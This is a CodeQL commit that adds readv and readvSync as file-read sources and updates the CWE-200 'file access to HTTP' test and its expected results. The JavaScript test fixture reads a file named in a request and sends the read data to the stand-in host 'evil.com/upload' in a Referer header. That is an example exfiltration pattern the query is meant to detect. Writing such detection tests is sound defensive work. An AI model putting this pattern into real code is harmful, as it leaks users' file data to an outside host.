Added support for readv and readvSync functions in NodeJSFileSystemAccessRead class .

Napalys · Napalys · commit 5c13997ec339 · 2025-03-28T08:37:33.000+01:00
diff --git a/javascript/ql/lib/semmle/javascript/frameworks/NodeJSLib.qll b/javascript/ql/lib/semmle/javascript/frameworks/NodeJSLib.qll
@@ -603,7 +603,9 @@ module NodeJSLib {
 
   /** A file system read. */
   private class NodeJSFileSystemAccessRead extends FileSystemReadAccess, NodeJSFileSystemAccess {
-    NodeJSFileSystemAccessRead() { methodName = ["read", "readSync", "readFile", "readFileSync"] }
+    NodeJSFileSystemAccessRead() {
+      methodName = ["read", "readSync", "readFile", "readFileSync", "readv", "readvSync"]
+    }
 
     override DataFlow::Node getADataNode() {
       if methodName.matches("%Sync")
diff --git a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.expected b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.expected
@@ -1,6 +1,8 @@
 #select
 | FileAccessToHttp.js:5:11:10:1 | {\\n  hos ... ent }\\n} | FileAccessToHttp.js:4:15:4:47 | fs.read ... "utf8") | FileAccessToHttp.js:5:11:10:1 | {\\n  hos ... ent }\\n} | Outbound network request depends on $@. | FileAccessToHttp.js:4:15:4:47 | fs.read ... "utf8") | file data |
 | FileAccessToHttp.js:18:15:23:5 | {\\n      ... }\\n    } | FileAccessToHttp.js:16:21:16:56 | await f ... "utf8") | FileAccessToHttp.js:18:15:23:5 | {\\n      ... }\\n    } | Outbound network request depends on $@. | FileAccessToHttp.js:16:21:16:56 | await f ... "utf8") | file data |
+| FileAccessToHttp.js:35:13:40:3 | {\\n    h ... d }\\n  } | FileAccessToHttp.js:34:25:34:52 | await f ... uffer]) | FileAccessToHttp.js:35:13:40:3 | {\\n    h ... d }\\n  } | Outbound network request depends on $@. | FileAccessToHttp.js:34:25:34:52 | await f ... uffer]) | file data |
+| FileAccessToHttp.js:44:13:49:3 | {\\n    h ... 2 }\\n  } | FileAccessToHttp.js:43:26:43:52 | fs.read ... ffer2]) | FileAccessToHttp.js:44:13:49:3 | {\\n    h ... 2 }\\n  } | Outbound network request depends on $@. | FileAccessToHttp.js:43:26:43:52 | fs.read ... ffer2]) | file data |
 | bufferRead.js:32:21:32:28 | postData | bufferRead.js:12:22:12:43 | new Buf ... s.size) | bufferRead.js:32:21:32:28 | postData | Outbound network request depends on $@. | bufferRead.js:12:22:12:43 | new Buf ... s.size) | file data |
 | googlecompiler.js:37:18:37:26 | post_data | googlecompiler.js:43:54:43:57 | data | googlecompiler.js:37:18:37:26 | post_data | Outbound network request depends on $@. | googlecompiler.js:43:54:43:57 | data | file data |
 | readFileSync.js:25:18:25:18 | s | readFileSync.js:5:12:5:39 | fs.read ... t.txt") | readFileSync.js:25:18:25:18 | s | Outbound network request depends on $@. | readFileSync.js:5:12:5:39 | fs.read ... t.txt") | file data |
@@ -18,6 +20,16 @@ edges
 | FileAccessToHttp.js:16:21:16:56 | await f ... "utf8") | FileAccessToHttp.js:16:11:16:56 | content | provenance |  |
 | FileAccessToHttp.js:22:16:22:35 | { Referer: content } [Referer] | FileAccessToHttp.js:18:15:23:5 | {\\n      ... }\\n    } | provenance |  |
 | FileAccessToHttp.js:22:27:22:33 | content | FileAccessToHttp.js:22:16:22:35 | { Referer: content } [Referer] | provenance |  |
+| FileAccessToHttp.js:34:9:34:21 | { bytesRead } | FileAccessToHttp.js:34:9:34:52 | bytesRead | provenance |  |
+| FileAccessToHttp.js:34:9:34:52 | bytesRead | FileAccessToHttp.js:39:25:39:33 | bytesRead | provenance |  |
+| FileAccessToHttp.js:34:25:34:52 | await f ... uffer]) | FileAccessToHttp.js:34:9:34:21 | { bytesRead } | provenance |  |
+| FileAccessToHttp.js:39:14:39:35 | { Refer ... sRead } [Referer] | FileAccessToHttp.js:35:13:40:3 | {\\n    h ... d }\\n  } | provenance |  |
+| FileAccessToHttp.js:39:25:39:33 | bytesRead | FileAccessToHttp.js:39:14:39:35 | { Refer ... sRead } [Referer] | provenance |  |
+| FileAccessToHttp.js:43:9:43:22 | { bytesRead2 } | FileAccessToHttp.js:43:9:43:52 | bytesRead2 | provenance |  |
+| FileAccessToHttp.js:43:9:43:52 | bytesRead2 | FileAccessToHttp.js:48:25:48:34 | bytesRead2 | provenance |  |
+| FileAccessToHttp.js:43:26:43:52 | fs.read ... ffer2]) | FileAccessToHttp.js:43:9:43:22 | { bytesRead2 } | provenance |  |
+| FileAccessToHttp.js:48:14:48:36 | { Refer ... Read2 } [Referer] | FileAccessToHttp.js:44:13:49:3 | {\\n    h ... 2 }\\n  } | provenance |  |
+| FileAccessToHttp.js:48:25:48:34 | bytesRead2 | FileAccessToHttp.js:48:14:48:36 | { Refer ... Read2 } [Referer] | provenance |  |
 | bufferRead.js:12:13:12:43 | buffer | bufferRead.js:13:21:13:26 | buffer | provenance |  |
 | bufferRead.js:12:13:12:43 | buffer | bufferRead.js:13:32:13:37 | buffer | provenance |  |
 | bufferRead.js:12:22:12:43 | new Buf ... s.size) | bufferRead.js:12:13:12:43 | buffer | provenance |  |
@@ -74,6 +86,18 @@ nodes
 | FileAccessToHttp.js:18:15:23:5 | {\\n      ... }\\n    } | semmle.label | {\\n      ... }\\n    } |
 | FileAccessToHttp.js:22:16:22:35 | { Referer: content } [Referer] | semmle.label | { Referer: content } [Referer] |
 | FileAccessToHttp.js:22:27:22:33 | content | semmle.label | content |
+| FileAccessToHttp.js:34:9:34:21 | { bytesRead } | semmle.label | { bytesRead } |
+| FileAccessToHttp.js:34:9:34:52 | bytesRead | semmle.label | bytesRead |
+| FileAccessToHttp.js:34:25:34:52 | await f ... uffer]) | semmle.label | await f ... uffer]) |
+| FileAccessToHttp.js:35:13:40:3 | {\\n    h ... d }\\n  } | semmle.label | {\\n    h ... d }\\n  } |
+| FileAccessToHttp.js:39:14:39:35 | { Refer ... sRead } [Referer] | semmle.label | { Refer ... sRead } [Referer] |
+| FileAccessToHttp.js:39:25:39:33 | bytesRead | semmle.label | bytesRead |
+| FileAccessToHttp.js:43:9:43:22 | { bytesRead2 } | semmle.label | { bytesRead2 } |
+| FileAccessToHttp.js:43:9:43:52 | bytesRead2 | semmle.label | bytesRead2 |
+| FileAccessToHttp.js:43:26:43:52 | fs.read ... ffer2]) | semmle.label | fs.read ... ffer2]) |
+| FileAccessToHttp.js:44:13:49:3 | {\\n    h ... 2 }\\n  } | semmle.label | {\\n    h ... 2 }\\n  } |
+| FileAccessToHttp.js:48:14:48:36 | { Refer ... Read2 } [Referer] | semmle.label | { Refer ... Read2 } [Referer] |
+| FileAccessToHttp.js:48:25:48:34 | bytesRead2 | semmle.label | bytesRead2 |
 | bufferRead.js:12:13:12:43 | buffer | semmle.label | buffer |
 | bufferRead.js:12:22:12:43 | new Buf ... s.size) | semmle.label | new Buf ... s.size) |
 | bufferRead.js:13:21:13:26 | buffer | semmle.label | buffer |
diff --git a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js
@@ -31,21 +31,20 @@ app.post('/readv', async (req, res) => {
   const { filename } = req.body;
   const fd = await fs.open(filename, 'r'); 
   const buffer = Buffer.alloc(1024);
-  const { bytesRead } = await fs.readv(fd, [buffer]); // $ MISSING: Source[js/file-access-to-http]
+  const { bytesRead } = await fs.readv(fd, [buffer]); // $ Source[js/file-access-to-http]
   https.get({
     hostname: "evil.com",
     path: "/upload",
     method: "GET",
     headers: { Referer: bytesRead }
-  }, () => { }); // $ MISSING: Alert[js/file-access-to-http]
+  }, () => { }); // $ Alert[js/file-access-to-http]
 
   const buffer2 = Buffer.alloc(1024);
-  const { bytesRead2 } = fs.readvSync(fd, [buffer2]); // $ MISSING: Source[js/file-access-to-http]
+  const { bytesRead2 } = fs.readvSync(fd, [buffer2]); // $ Source[js/file-access-to-http]
   https.get({
     hostname: "evil.com",
     path: "/upload",
     method: "GET",
     headers: { Referer: bytesRead2 }
-  }, () => { }); // $ MISSING: Alert[js/file-access-to-http]
-
+  }, () => { }); // $ Alert[js/file-access-to-http]
 });
